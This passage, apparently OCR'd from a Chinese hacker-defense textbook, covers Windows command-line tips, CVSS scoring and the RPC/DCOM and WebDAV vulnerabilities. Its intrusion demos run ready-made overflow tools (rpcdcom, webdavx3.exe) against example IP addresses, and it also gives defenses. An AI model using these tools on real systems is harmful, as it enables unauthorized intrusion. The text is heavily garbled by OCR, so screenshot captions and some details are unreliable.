由 与 局 域 网 络 连接 的 情况 ， 则 在 “命令 提 
示 符 ”窗口 中 输入 tracert www.baidu.com 命 
令 ， 按 Enter 键 ， 其 显示 结果 如 下 图 所 示 。 


WR WNDOWS lien Imd eee Oo x 


ee 


4 
.taky p05, jp bb sin 


tokyjp0s, 8 


ae rd tkekhedl. he. bh. sir ntt 
ae-1. rs tomeOl ie. th ein ne 


ae-1.a0L newthk0B ic bt gin, ntt 


1.4 实战 演练 


实战 演练 1 一 一 自 定义 “命令 提示 符 ” 窗 昌 
口 的 显示 效果 
系统 默认 的 “命令 提示 符 ” 窗 口 显示 


的 背景 色 为 黑色 ， 文 字 为 白色 ， 那 么 如 何 自 
定义 其 显示 效果 呢 ? 具体 操作 步骤 如 下 。 

[step 国 右 去 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 执行 “运行 ”命令 ， 弹 出 “运行 ”对 
话 框 ， 在 其 中 输入 cmd 命 令 ， 单 击 “确定” 


按钮 打开 “命令 提示 符 ” 窗口 。 


丽 管理 员 : CWINDOWS\system32\em, 


在 弹出 的 快捷 菜单 


EE 国 右 击 窗口 的 顶部 ， 
中 执行 “属性 ”命令 。 


打开 “属性 ”对 话 框 ， 选 择 “颜色 ” 
机 卡 ， 过 中“ 习 攻 玫 时 单 和 术 但 ， 丰 
颜色 条 中 选中 白色 色 块 。 


画 "cwipowsts 


有 NB 得 
SRERRI 红 IR 255 仿 
x oa 5 
了 弹出 窗口 背 呈 (U) ED 号 


UL 夯 夯 夯 抽 =O 


这 证 风 寺 交口 让 色 
C:\WINDOWS> qd 


文字 ” 单 选 按 钮 ， 
色 块 。 


在 颜色 条 中 选中 黑色 
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丽 "CNWINDOWS\system32\emd.eve" 至 性 x 


表 顺 “字体 布 本色 


不 RD) 
30% 是 1oox fo 


Ce Pm 


[ep 图 单 去“ 确定 ”按钮 ， 返 回 到 “命令 提 
示 符 ”窗口 中 ， 可 以 看 到 “命令 提示 符 ” 
窗口 的 显示 方式 变 为 白 底 黑 字 样式 。 

画 管理 员 : CWWINDOWS\system32\cm. 一 口 X 


Jicrosoft Windows [版 本 10.0. 17. ] 竹 319] ~ 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


:NUsersVAdninistrator)e 


实战 演练 2 一 一 使 用 shutdown 命 
定时 关机 


使 用 shutdown 命 令 可 以 实现 定时 关机 
的 功能 ， 具 体操 作 步 又 如 下 。 


step 园 选择 “颜色 ”选项 卡 ， 选 中 “屏幕 


step 回 在 “命令 提示 符 ” 窗 口中 输入 shutdown 
/s/t 40 命 令 


Cwindows\system32\cmd.exe - 0 x 


indows [版 本 10. 0. 16299. 15] 
soft Corporation。 保留 所 有 权利 。 


C:\Users\Administrator>shutdowm /s /t 40- 


step 图 弹出 一 个 即将 注销 用 户 登 录 的 信息 


提示 框 ， 这 样 计算 机 就 会 在 规定 的 时 间 内 
关机 。 


[step 图 如 果 此 时 想 取消 关机 操作 ， 可 在 命令 
行 中 输入 命令 shutdown /a 后 按 Enter 键 ， 桌 
面 右 下 角 出 现 如 下 图 所 示 的 弹 窗 ， 表 示 取 
消 成 功 。 


小 试 身手 


1.5 


练习 1: 快速 锁定 Windows 桌 面 


在 离开 计算 机 时 ， 可 以 将 地 算 机 锁 
屏 ， 这 样 可 以 有 效 地 保护 桌面 隐私 。 主 要 
的 有 两 种 快速 锁 屏 的 方法 。 

(1) 使 用 菜单 命令 : 按 Windows 键 ， 弹 
出 “开始 ”菜单 ， 单 击 账户 头像 ， 在 弹出 
的 快捷 菜单 中 执行 “锁定 ”命令 ， 即 可 进 
入 锁 屏 界面 。 


(2) 使 用 快捷 键 : 按 Windows+L 组 合 
键 ， 可 以 快速 锁定 Windows 系 统 ， 进 入 锁 屏 


12 月 1 日 , 星期 六 
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练习 2: 隐藏 桌面 搜索 杠 


Windows 10 操 作 系统 的 任务 栏 默认 
显示 搜索 框 ， 用 户 可 以 根据 需要 隐藏 搜索 
框 ， 具 体操 作 步 又 如 下 。 

[sep 国 在 任务 栏 上 单 击 筷 标 右键 ， 在 弹出 的 
快捷 菜单 中 选择 “Cortana” 一 “隐藏 ” 菜 
单 命令 。 


效果 如 下 图 所 示 。 


第 2 音 ”电脑 系统 漏 润 的 防护 策略 


目前 ， 用 户 普遍 使 用 的 操作 系统 为 Windows 10 操 作 系 统 ， 不 过 ， 该 系统 也 存在 这 样 或 那 
样 的 漏洞 ， 这 就 给 黑客 留 下 了 入 侵 攻 击 的 机 会 。 因 此 ， 计 算 机 用 户 如 何 才能 有 效 地 防止 黑客 
的 入 侵 攻 击 ， 就 成 了 迫在眉睫 的 问题 。 本 章 介绍 系统 漏洞 的 安全 防护 策略 ， 主 要 内 容 包 括 系 
统 漏 洞 的 相关 概述 、 典 型 系统 漏洞 的 入 门 与 防御 及 系统 漏洞 的 安全 防护 策略 等 。 


2.1 系统 漏洞 概述 


计算 机 系统 漏洞 也 被 称 为 系统 安全 缺 
陷 ， 这 些 安全 缺陷 会 被 技术 高 低 不 等 的 入 
侵 者 所 利用 ， 从 而 达到 其 控制 目标 主机 或 
造成 一 些 更 具 破坏 性 的 影响 的 目的 。 


2.1.1 什么 是 系统 漏洞 


系统 漏洞 是 指 应 用 软件 或 操作 系统 软 
件 在 逻辑 设计 上 的 缺陷 或 在 编写 时 产生 的 错 
误 。 某 个 程序 〈 包 括 操作 系统 ) 在 设计 时 未 
被 考虑 周全 ， 则 这 个 缺陷 或 错误 将 可 能 被 不 
法 分 子 或 黑客 利用 ， 通 过 植 入 木马 病毒 等 方 
式 来 攻击 或 控制 整个 计算 机 ， 从 而 窃取 计算 
机 中 的 重要 资料 和 信息 ， 甚 至 破坏 系统 。 

系统 漏洞 又 称 安全 缺陷 ， 可 对 用 户 造 
成 不 良 后 果 。 若 漏洞 被 恶意 用 户 利用 ， 会 造 
成 信息 泄露 ， 黑 客 攻击 网 站 即 是 利用 网 络 服 
务 器 操作 系统 的 漏洞 ， 对 用 户 操作 造成 不 
便 ， 如 不 明 原 因 的 死机 和 丢失 文件 等 。 


2.1.2 系统 漏洞 产生 的 原因 

系统 漏洞 的 产生 不 是 安装 不 当 的 结 
果 ， 也 不 是 使 用 后 的 结果 。 归 结 起 来 ， 其 
产生 的 原因 主要 有 以 下 几 点 。 

(1) 人 为 因素 : 编程 人 员 在 编写 程序 
过 程 中 故意 在 程序 代码 的 隐蔽 位 置 保留 了 
后 门 。 

(2) 硬件 因素 : 由 于 硬件 的 原因 ， 编 
程 人 员 无 法 弥补 硬件 的 漏洞 ， 从 而 使 硬件 
问题 通过 软件 表现 出 来 。 


(3) 客观 因素 : 受 编程 人 员 的 能 力 、 
经 验 和 当时 的 安全 技术 及 加 密 方法 发 展 水 
平 所 限 ， 在 程序 中 难免 存在 不 足 之 处 ， 而 
这 些 不 足 恰恰 会 导致 系统 漏洞 的 产生 。 


2.2 系统 漏洞 评分 标准 一 一 
CVSS 


通用 弱点 评价 体系 (CVSS，Common 
Vulnerability Scoring System) 是 由 NIAC 开 
发 、FIRST 维 护 的 一 个 开放 且 能 够 被 产品 厂 
商 免费 采用 的 标准 。 利 用 该 标准 ， 可 以 对 
弱点 进行 评分 ， 进 而 帮助 我 们 判断 修复 不 
同 弱点 的 优先 等 级 。 


2.2.1 CVSS 简 介 


CVSS 是 一 个 行业 公开 标准 ， 可 以 帮助 
用 户 建立 衡量 漏洞 严重 程度 的 标准 ， 比 较 
漏洞 的 严重 程度 ， 从 而 确定 处 理 它们 的 优 
先 级 。 

CVSS 得 分 基于 一 系列 维度 上 的 测量 结 
果 ， 这 些 测量 维度 被 称 为 量度 (Metrics)。 
漏洞 的 最 终 得 分 最 大 为 10， 最 小 为 0。 得 分 
在 7 一 10 的 漏洞 通常 被 认为 比较 严重 ， 得 分 
在 4 一 6.9 的 是 中 级 漏洞 ，0 一 3.9 的 则 是 低 
级 漏洞 。CVSS 包 括 3 种 类 型 的 分 数 : 基本 
分 数 、 暂 时 分 数 和 环境 分 数 。 其 中 ， 基 本 
分 数 和 暂时 分 数 通常 由 安全 产品 卖主 、 供 
应 商 给 出 ， 因 为 他 们 能 够 更 加 清楚 地 了 解 
漏洞 的 详细 信息 ; 环境 分 数 通常 由 用 户 给 


出 ， 因 为 他 们 能 够 在 自己 的 使 用 环境 下 更 
好 地 评价 漏洞 存在 的 潜在 影响 。 
2.2.2 CVSS 计 算 方 法 

CVSS 有 一 整套 漏洞 评分 计算 方法 ， 但 
也 有 一 些 指标 具有 不 确定 性 和 复杂 性 ， 会 


导致 完全 的 定量 分 析 困 难 。 它 采用 了 3 个 客 
观 性 指标 和 11 个 主观 性 指标 。 


1. 基本 评价 

基本 评价 是 指 该 漏洞 本 身 固有 的 一 些 特 
点 ， 以 及 这 些 特点 可 能 造成 的 影响 评价 分 值 。 

(1) 攻击 途径 (AccessVector) : 本 地 
攻击 得 分 为 0.7， 远 程 攻 击 得 分 为 1.0。 

(2) 攻击 复杂 度 (AccessComplexity) : 
分 为 低 、 中 、 高 3 个 标准 ， 给 出 的 分 值 分 别 
为 0.6、0.8、1.0。 

(3) 认证 (Authentication) : 需要 认 
证 得 分 为 0.6、 不 需要 认证 得 分 为 1.0。 

(4) 机 密 性 (ConfImpact): 不 受 影响 
得 分 为 0、 部 分 影响 得 分 为 0.7、 完 全 影响 得 
分 为 1.0。 

(5) 完整 性 (IntegImpact) : 不 受 影响 
得 分 为 0、 部 分 影响 得 分 为 0.7、 完 全 影响 得 
分 为 1.0。 

(6) 可 用 性 〈AvailImpact) : 不 受 影 
响 得 分 为 0、 部 分 影响 得 分 为 0.7、 完 全 影响 
得 分 为 1.0。 

(7) 权 值 倾向 : 平均、 机 密 性 、 完 整 性 、 
可 用 性 得 分 分 别 为 0.333、0.5、0.25 和 0.25。 

计算 公式 为 : 基本 评价 = (10X 攻 击 途 
径 X 攻 击 复杂 度 X 认 证 X (机密 性 X 机 密 性 
权重 + 完整 性 X 完 整 性 权重 + 可 用 性 X 可 
用 性 权重 )) 


2. 生命 周期 评价 

生命 周期 评价 是 针对 较 新 类 型 漏洞 
〈 如 0day 漏 洞 ) 设置 的 评分 项 ， 因 此 SQL 注 
入 漏洞 不 用 考虑 。 这 里 列举 出 3 个 与 时 间 紧 
密 关 联 的 要 素 及 其 得 分 ， 具 体 介绍 如 下 。 
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(1) 可 利用 性 : 未 证 明 得 分 为 0.85、 概 
念 证 明 得 分 为 0.9、 功 能 性 得 分 为 0.95、 完 
全 代码 得 分 为 1.0。 

(2) 修复 措施 : 官方 补丁 得 分 为 0.87、 
临时 补丁 得 分 为 0.9、 临 时 解决 方案 得 分 为 
0.95、 无 措施 得 分 为 1.0。 

(3) 确认 程度 : 不 确认 得 分 为 0.9、 未 
经 确认 得 分 为 0.95、 已 确认 得 分 为 1.0。 

计算 公式 为 : 生命 周期 评价 = 基本 评 
价 X 可 利用 性 X 修 复 措 施 X 未 经 确认 


3. 环境 评价 

每 个 漏洞 会 造成 的 影响 大 小 都 与 用 户 
实际 工作 环境 密 不 可 分 ， 因 此 可 选项 中 又 
包括 了 环境 评价 ， 这 可 以 由 用 户 自 评 。 

(1) 危害 影响 程度 无 得 分 为 0、 低 得 
分 为 0.1、 中 得 分 为 0.3、 高 得 分 为 0.5。 

(2) 目标 分 布 范围 ,无 (0%) 得 分 为 
0、 低 (1%~15%) 得 分 为 0.25S、 中 〈16% 一 
49%) 得 分 为 075、 高 (50% 一 100% ) 得 分 
为 1.0。 

计算 公式 为 :环境 评价 = (生命 周期 评 
价 + (10- 生 命 周 期 评价 )X 危 害 影 响 程 度 )X 
目标 分 布 范围 

评分 与 危险 等 级 介绍 如 下 。 

e [0.4): 被 认为 是 低 等 级 威胁 。 

e [4.7): 被 认为 是 中 等 级 威胁 。 

e [7,10]: 被 认为 是 高 等 级 威胁 。 

不 同 机 构 按 照 CVSS 分 值 定义 威胁 的 
低 、 中 、 高 威胁 级 别 (Severfity) ，CVSS 
体现 漏洞 的 风险 ， 威 胁 级 别 表示 漏洞 风险 
对 系统 的 影响 程度 ，CVSS 分 值 是 工业 标 
准 ， 威 胁 级 别 不 是 。 


2.3 RPC 服务 远程 漏 润 的 防护 
策略 


RPC 协 议 是 Windows 操 作 系统 使 用 的 一 
种 协议 ， 提 供 了 系统 中 进程 之 间 的 交互 通 
信 ， 人 允许 在 远程 主机 上 运行 任意 程序 。 在 
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Windows 操 作 系统 中 使 用 的 RPC 协 议 ， 包 括 
Microsoft 其 他 一 些 特定 的 扩展 ， 系 统 大 多 
数 的 功能 和 服务 都 依赖 于 它 ， 它 是 操作 系 
统 中 极为 重要 的 一 个 服务 。 


加 2.3.1 ”什么 是 RPC 服 务 远程 漏洞 


8 RPC 全 称 是 Remote Procedure Call, 在 
操作 系统 中 ， 它 默认 是 开启 的 ， 为 各 种 网 
络 通信 和 管理 提供 了 极 大 的 方便 ， 但 也 是 
危害 极为 严重 的 漏洞 攻击 点 ， 曾 经 的 冲击 
波 、 震 荡 波 等 大 规模 攻击 和 蠕虫 病毒 都 是 
Windows 操 作 系 统 的 RPC 服 务 漏洞 造成 的 。 
可 以 说 ， 每 一 次 的 RPC 服 务 漏洞 的 出 现 且 被 
攻击 ， 都 会 给 网 络 系统 带 来 一 场 灾 难 。 
启动 RPC 服 务 的 具体 操作 步骤 如 下 。 
[step 轩 在 Windows 操 作 界 面 中 选择 “ 开 
始 ” 一 “Windows 系 统 ” 一 “控制 面板 ”一 
“管理 工具 ”选项 ， 打 开 “ 管 理工 具 ” 窗 口 。 


= | 入 理 I 内 - 0O 
EI = :rr a 
个 箔 “所 有 注 ，， 管 理 I 具 v 局。 | 提 索 * 理 了 贞 
名 称 
》 由 快速 访问 
人 SCSl 发 二 国 序 
"oun 局 oD8c 数 王 (32 向 
加 此 及 网 0D8C 数 疾 源 (64 位) 
页 Windows 内 存 育 断 
Dd 斋 二 安全 第 中 
训 开本 海 于 
冲 打 多 理 
次 加 和 
和 兆 高 级 过 全 Windows Defender 防火 地 
你 复 开动 
其 计算 机 管理 
四 任 si 计划 但 序 
< 
19 个 项 目 国 


Eee 四 在 “管理 工具 ”窗口 中 双击 “服务 ” 
图 标 ， 打 开 “ 服 务 ” 窗 口 。 


计时 - D 
文件 站” 沽 /:(A】 豆 看 MI 帮助 Hi 

和 团 | 园 | 回回 加 | 四 问 | Pn 

二 
Remote Procedure Call RPC 2 


上 


TL 


Ee 
Ea 
E33 
a 
= 
#0 
a 


14 


= 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


[step 图 在 服务 (本 地 ) 列表 中 双击 “Remote 
Procedure Call (RPC) ”选项 ， 打 开 
“Remote Procedure Call (RPC) 的 属性 
(本 地 计算 机 ) ”对 话 框 ， 在 “常规 ” 选 
项 卡 中 可 以 查看 该 协议 的 启动 类 型 。 


卫生 EJ 
B72 


Remote Procedure Cal RP) 


从 上 他 所 二 和 和 “你 本 玫 尼 所 用 的 天 区 


Ed Ew 


选择 “依存 关系 ”选项 卡 ， 在 显示 的 
界面 中 可 以 查看 一 些 服务 的 依赖 关系 。 


Remete Procedure Coll [RPO 的 要 性 [EXE 其 x 


妆 遇 下 只 区 做 。 全 天 系 
8 生体 委 兵 他 受 生 、 系 过 到 入 式 吉 科 部 但 如 于 归 个 系 红 引 从 习 从 
还 生 不 正 党， 全 入 于 它 和 务 安 委员 六 

Remote Procedure Cal (RoC) 


RL FRET 


COM Server Procees Lumcher 
WC endpoime Mapeer 


分 析 : 从 上 图 的 显示 服务 可 以 看 出 ， 
受 其 影响 的 系统 组 件 有 很 多 ， 其 中 包括 了 
DCOM 接 口服 务 ， 这 个 接口 用 于 处 理由 客 
户 端 机 器 发 送 给 服务 器 的 DCOM 对 象 激活 
请 求 ( 如 UNC 路 径 ) 。 攻 击 者 若 成 功利 用 
此 漏洞 则 可 以 以 本 地 系统 权限 执行 任意 指 
令 ， 还 可 以 在 系统 上 执行 任意 操作 ， 如 安 
装 程序 ， 查 看 、 更 改 或 删除 数据 ， 建 立 系 
统管 理 员 权限 的 账户 等 。 


若 想 对 DCOM 接 口 进行 相应 的 配置 ， 
其 具体 操作 步骤 如 下 。 
[step 图 | 执行 “开始 ”一 “运行 ”命令 ， 在 弹 
出 的 “运行 ”对 话 框 中 输入 Dcomcnfg 命 令 。 


可 运行 x 


Mor EEE De, herr 
文件 天， 区 Intemet 机 


Flo [Deoma 厅 


时 过 用 生理 了 情 训 寻 此 攻 务 - 
[step 图 单 直 “确定 ”按钮 ， 弹 出 “组 件 服务 ” 
窗口 ， 单 击 “ 组 件 服务 ”前 面 的 “>” 号 ， 依 
次 展开 各 项 ， 直 到 出 现 “DCOM 配 置 ”选项 为 
止 ， 即 可 查看 DCOM 中 各 个 配置 对 象 。 


根据 需要 选择 DCOM 配 置 的 对 象 ， 
如 AxLogin， 并 单 击 和 鼠标 右键 ， 从 弹出 的 
快捷 菜单 中 选择 “属性 ”菜单 命令 ， 打 开 
“AxLogin 属 性 ”对 话 框 ， 在 “身份 验证 级 
别 ” 下 拉 列 表 中 根据 需要 选择 相应 的 选项 。 


基 抽 位 玲 安全 。 颖 簿 点 标 内 


此 DCON 应 用 得 序 的 过 六 硬性 
FS: Autogin 
语序 ID: 1E97FBBe1-5981-4EE1-97F1-38A146A65CAC 
应 同 全 as 本 地 骤 关 加 
从 失 IU | 本 大 司 
二 : 
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[step 选择 “位 置 ” 选 项 卡 ， 在 打开 的 界面 
中 对 AxLogin 对 象 进行 位 置 的 设置 。 


DCOM 可 以 草 过 下 列 设 秆 为 应 用 程序 定位 正确 的 计算 机 。 如 果 多 迁 ，DCOM 
格 使 用 等 一 个 适用 设置， 客户 庄 应 月 程序 可 以 磊 关 此 处 的 壬 择 . 


器 ER 在 的 计算 机 上 去 行 应 用 各 序 (D)。 


计算 机上 运 和 


回 在 RH 咎 机 上 运行 应 用 得 序 (P 


了 解 有 关 论 豆 演艺 古 性 的 洋 纪 信息 


选择 “安全 ”选项 卡 ， 在 打开 的 界面 
中 对 AxLogin 对 象 的 启动 和 激活 权限 、 访 问 
权限 和 配置 权限 进行 设置 。 

Axdogin 属性 1 x 
局 动 f0 激 活 权限 
@ 使 用 讨 兴 值 (U) 


O saX(s) G3) 


访问 权限 
图 使 用 驮 六 年 (P) 


OsaxM 区 各 D) 


二) 


了 角 有 关 设 各 这 苦 主 性 的 详细 信息 . 


[Eee 图 选择 “终结 点 ”选项 卡 ， 在 打开 的 界 
面 中 对 AxLogin 对 象 进行 终结 点 的 设置 。 


到 湛 二 FA) 
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Ca ww || nn 
step 园 选择 “标识 ”选项 卡 ， 在 打开 的 界面 
中 对 AxLogin 对 象 进行 标识 的 设置 ， 选 择 运 
行 此 应 用 程序 的 用 户 账户 。 设 置 完 成 后 ， 
单 击 “ 确 定 ” 按 钮 即 可 。 


vogin 局 全 ? 


入 。 人 0 是 安全。 撩 关中 抹 只 


过 综 到 此 应 用 屋 序 轨 同 关外 记 


OF) 


了 解 有 关 刘 本 这 些 刷 作 的 洋 经 信息 ， 
Ce w | 羡 


由 于 DCOM 可 以 远程 操作 其 他 计算 机 
中 的 DCOM 程 序 ， 而 技术 使 用 的 是 用 于 调 
用 其 他 计算 机 所 具有 的 函数 的 RPC (远程 
过 程 调用 ) ， 因 此 ， 利 用 这 个 漏洞 ， 攻 击 
者 只 需要 发 送 特 殊 形式 的 请 求 到 远程 计算 
机 上 的 135 端 口 ， 轻 则 可 以 造成 拒绝 服务 攻 
击 ， 重 则 可 以 以 本 地 管理 员 权 限 执 行 任何 
操作 。 
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2.3.2 ”RPC 服 务 远程 漏洞 入 侵 演示 


DcomRpc 接 口 漏 洞 对 Windows 操 作 系 
统 乃 至 整个 网 络 安全 的 影响 ， 可 以 说 超过 
了 以 往 任 何 一 个 系统 漏洞 。 其 主要 原因 是 
DCOM 是 目前 几乎 各 种 版 本 的 Windows 系 
统 的 基础 组 件 ， 应 用 比较 广泛 。 下 面 就 以 
DComRpc 接 口 漏洞 的 溢出 为 例 ， 为 大 家 详 
细 讲 解 溢出 的 方法 。 
[sep 回 将 下 载 好 的 DComRpc.xpn 插 件 复 制 
到 XX-Scan 的 plugins 文 件 夹 中 ， 作 为 XX-Scan 
插件 。 


[step 图 运行 X-Scan 扫 描 工 具 ， 选 择 “ 设 
置 ” 一 “扫描 参数 ”选项 ， 打 开 “ 扫 描 参 
数 ” 对 话 框 ， 再 选择 “全 局 设置 ”一 “扫描 
模块 ”选项 ， 即 可 看 到 添加 的 “DComRpc 
溢出 漏洞 ”模块 。 


a 加 
step 图 在 使 用 X-Scan 扫 描 到 具有 DComRpc 
接口 漏洞 的 主机 时 ， 可 以 看 到 在 XX-Scan 中 
有 明显 的 提示 信息 ， 并 给 出 相应 的 HTML 格 
式 的 扫描 报告 。 


OR 0 | BY een repor 


ET 才 人 年 二 全 全 天 二 RS 人 二 下。 


主机 地址 庙 口 / 奈 劳 夯 务 天 局 
aa irosofeds (Sp) ES 


夫 型 “| 喘 口 / 届 务 
ask 由 


EEC 


[step 回 如 果 使 用 RpcDcom.exe 专 用 DcomRpC 
溢出 漏洞 扫描 工具 ， 则 可 先 打开 “命令 提 
示 符 ”窗口 ， 进 入 RpcDcom.exe 所 在 文件 
夹 ， 执 行 “rpcdcom -d 192.168.0.130” 命 令 
后 开始 扫描 并 会 给 出 最 终 的 扫描 结果 。 


画 管理 员 : C\WINDOWS\system3zwmd.， 一 口 | 


icrosoft Windows [版 本 10.0. 17134. 319] ^ 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 | 


:\Users\Administrator’cd c:\ 
ciV>cd rpcdcom 


c:\RpcDcomrpcdcom -d 192. 168. 0. 130。 


2.3.3 ”RPC 服 务 远程 漏洞 的 防御 


RPC 服 务 远程 漏洞 可 以 说 是 Windows 操 
作 系 统 中 最 为 严重 的 一 个 系统 漏洞 ， 下 面 
介绍 几 个 RPC 服 务 远程 漏洞 的 防御 方法 ， 
以 使 用 户 的 计算 机 或 系统 处 于 相对 安全 的 


1. 及 时 为 系统 打 补 丁 


防御 系统 出 现 漏洞 最 直接 、 有 效 的 方 
法 是 打 补 丁 ， 对 于 RPC 服 务 远程 溢出 漏洞 的 
防御 也 是 如 此 。 不 过 在 对 系统 打 补 丁 时 ， 
务必 要 注意 补丁 相应 的 系统 版 本 。 


2. 关闭 RPC 服 务 


关闭 RPC 服 务 也 是 防范 DcomRpc 漏 洞 
攻击 的 方法 之 一 ， 而 且 效 果 非 常 彻底 。 
其 具体 的 方法 为 : 选择 “开始 ”一 “ 设 
置 ” 一 “控制 面板 ”一 “管理 工具 ” 选 
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项 ， 在 打开 的 “管理 工具 ”窗口 中 双击 
“服务 ”图 标 ， 打 开 “ 服 务 ” 窗 口 。 在 其 
中 双击 “Remote Procedure Call (RPC) ” 
服务 项 ， 打 开 其 属性 窗口 。 在 属性 窗口 中 
将 启动 类 型 设置 为 “禁用 ”， 这 样 自 下 次 
开机 开始 RPC 将 不 再 启动 。 


FRemote Procedure Cal (RPO 的 是 性 二 地 下 FU 时 


A 


Dh [3 
让 Romate procedure Cal Re 
所 壕 : 


OM 和 DCOM 开朗 和 证 
更 王政 COM 和 DCOM 服务 9 多 和 而、 
司职 Xe 用: 

CCYWINDOWSwysemazwvedhosteoe -kmpem 


sma 


RE Be 
as) a Ca WN 
= 


Ce ww 

另外 ， 还 可 以 在 注册 表 编 辑 器 中 将 
HKEY LOCAL MACHINE\SYSTEM\Cur- 
rentControlSet\Services\RpcSs 的 Start 值 由 4 变 
成 2， 重 新 启动 计算 机 。 


PE 
A Mele 


辣 
ESECI: 4 "LGA 


Ce 


不 过 ， 进 行 这 种 设置 后 ， 将 会 给 Win- 
dows 的 运行 带 来 很 大 的 影响 ， 例 如 从 登录 
Windows 10 系 统 到 显示 桌面 ， 要 等 待 相当 
长 的 时 间 。 这 是 因为 Windows 的 很 多 服务 都 
依赖 于 RPC， 在 将 RPC 设 置 为 无 效 后 ， 这 
些 服务 将 无 法 正常 启动 。 这 种 方式 的 浆 端 
非常 大 ， 一 般 不 能 采取 这 种 关闭 RPC 服 务 
的 方式 。 
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3. 手动 为 计算 机 启用 〈 或 禁用 ) DCOM 


针对 具体 的 RPC 服 务 组 件 ， 用 户 还 可 以 
采用 具体 的 方法 进行 防御 。 例 如 禁用 RPC 服 
务 组 件 中 的 DCOM 服 务 ， 这 里 以 Windows 10 
操作 系统 为 例 ， 其 具体 的 操作 步骤 如 下 。 
[step 图 选择 “开始 ”一 “运行 ”选项 ， 打 
开 “ 运 行 ” 对 话 框 ， 输 入 Dcomcnfg 命 令 ， 
单 击 “ 确 定 ” 按 钮 ， 打 开 “ 组 件 服务 ?” 
窗口 ， 选 择 “控制 台 根 节点 ”一 “组 件 服 
务 ” 一 “计算 机 ”一 “我 的 电脑 ”选项 ， 
进入 “我 的 电脑 ”文件 夹 ， 若 针对 于 本 地 
计算 机 ， 则 需要 右 击 “ 我 的 电脑 ”选项 ， 
从 弹出 的 快捷 菜单 中 选择 “属性 ”选项 。 


本 gai4S 


- OO * 
入 文 4 站 ”要 作 (N 可 看 V) 窗 DW) im 
和 中 | 由 加 | 多 目 日 具 | 旧 加 | 全 癌 潮 号 莉 鱼 
辐 入 HE 根 训 EE E33 
YY 生硬 人 服务 可 covr tpes < 
四 es 司 pcom 下 本 更 了 和 作 
Pe | 
3 R(t 下) » 
从 这 于 和 耳塞 DW) 
St) 
ee 
step 图 打开 “我 的 电脑 属性 ”对 话 框 ， 选 


择 “ 上 默认 属 性 ”选项 卡 ， 进 入 “默认 属 
性 ”设置 界面 ， 取 消 勾 选 “ 在 此 计算 机 上 
启用 分 布 式 COM (E) ” 复 选 框 ， 然 后 单 击 
“确定 ”按钮 即 可 。 

我 的 电脑 属性 

第 岗 。 选项 。 然 人 居住 默 兴 协议 COM 安全 MSDTC 


Dk 


以 分 机 区 COM 通信 层 必 
身 兴 验 还 加 必定 效 过 人 SI 上 的 安 主 . 


MA 人 RU 
ws 
他 0 及 | 并 宇 站 用 但 字 呈 可以 过 让 兰 且 吉 ，L 及 可 L 人 二 帮 广 汪 
MA tls 
Ba 


如 村 全 用 身价 失 证 时 认 档 六 弘 不 县委 二 ， 则 可 以 汉人 3| 用 可 辽 安 全 。 


18 


= 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


[step 图 若 针 对 于 远程 计算 机 ， 则 需要 右 去 
“计算 机 ”选项 ， 从 弹出 的 快捷 菜单 中 选 
择 “ 新 建 ” 一 “计算 机 ”选项 ， 打 开 “ 添 
加 计算 机 ”对 话 框 。 

a 查看 V) 窗口 (W) 雪 助 . 
目 @ 日 珊 卫 


step 图 在 “添加 计算 机 ”对 话 框 中 ， 直 接 输 
入 计算 机 名 或 单 击 右 侧 的 “浏览 ”按钮 来 
搜索 计算 机 。 


添 Ini 算 机 X 


Fy 输入 计算 机 会 ， 或 单 十 "浏览 " 按 角 搜索 计算 机 。 


浏 泡 B).… 


2.4 WebDAV 漏 洞 的 防护 策略 


WebDAV 漏 洞 也 是 系统 中 常见 的 漏洞 之 
一 ， 黑 客 利用 该 漏洞 进行 攻击 ， 可 以 获取 
系统 管理 员 的 最 高 权限 。 


2.4.1 什么 是 WebDAV 缓 冲 区 溢出 漏洞 


WebDAV 缓 冲 区 溢出 漏洞 出 现 的 主要 
原因 是 IIS 服 务 默认 提供 了 对 WebDAV 的 支 
持 ，WebDAV 可 以 通过 HTTP 向 用 户 提供 远 
程 文件 存储 的 服务 ， 但 是 该 组 件 不 能 充分 
检查 传递 给 部 分 系统 组 件 的 数据 ， 这 样 远 
程 攻击 者 利用 这 个 漏洞 就 可 以 对 WebDAV 进 
行 攻击 ， 从 而 获得 LocalSystem 权 限 ， 进 而 
完全 控制 目标 主机 。 


2.4.2 ”WebDAV 缓 冲 区 溢出 漏洞 入 侵 演示 


下 面 就 来 简单 介绍 WebDAV 缓 冲 区 洲 
出 攻击 的 过 程 。 入 侵 前 攻击 者 需要 准备 两 


个 程序 ， 即 WebDAV 漏 洞 扫描 器 一 一 Web- 
DAVScan .exe 和 溢出 工具 webdavx3.exe， 其 
具体 的 操作 步 又 如 下 。 

[sep 加 下 载 并 解压 缩 WebDAV 漏 洞 扫描 器 ， 
在 解压 后 的 文件 夹 中 双击 WebDAVScan.exe 
可 执行 文件 ， 即 可 打开 其 操作 主 界面 ， 在 
“起 始 IP” 文 本 框 和 “结束 IP” 文 本 框 中 输 


入 要 扫描 的 耳 地 址 范围 。 
[TCROITTTTC 和 x 
TFL 台数 设 置 
Br [near My 0 si | et To: 网 
[CJ] tL 
TT Messe T MI? Mnner . CT ] 


[step 图 输入 完毕 后 ， 单 击 “ 扫 描 ” 按 钮 ， 
即 可 开始 扫描 目标 主机 ， 该 程序 运行 速度 
非常 快 ， 可 以 准确 地 检测 出 远程 IIS 服 务 
器 是 否 存 在 WebDAV 漏 洞 ， 在 扫描 列表 的 
WebDAV 列 中 凡是 标明 Enable 的 则 说 明 该 主 
机 存在 漏洞 。 


而 webDAVscan V1.0 和 和 括号) 三 x 


| 并 证 
bm eT Mr E00 ET a- 5” et Ro Wn 网 


[CC 开 J] | 


[step 图 选择 “开始 ”一 “运行 ”选项 ， 在 打 
开 的 “运行 ”对 话 框 中 输入 cmd 命 令 ， 单 
击 “ 确 定 ” 按 钮 ， 打 开 “ 命 令 提示 符 ” 窗 
口 ， 输 入 cd c:\ 命 令 ， 进 入 C: 盘 目录 中 。 

[ 到 管理 员 ; CMWWINDOWS\system32\cm... 这 口 x 

OE 

:NMUsersNAdministratorycd c:\ 
cc: 


step 图 在 C: 盘 目录 中 输入 命令 “webdavx3. 
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exe 192.168.0.10”， 并 按 Enter 键 ， 即 可 开 
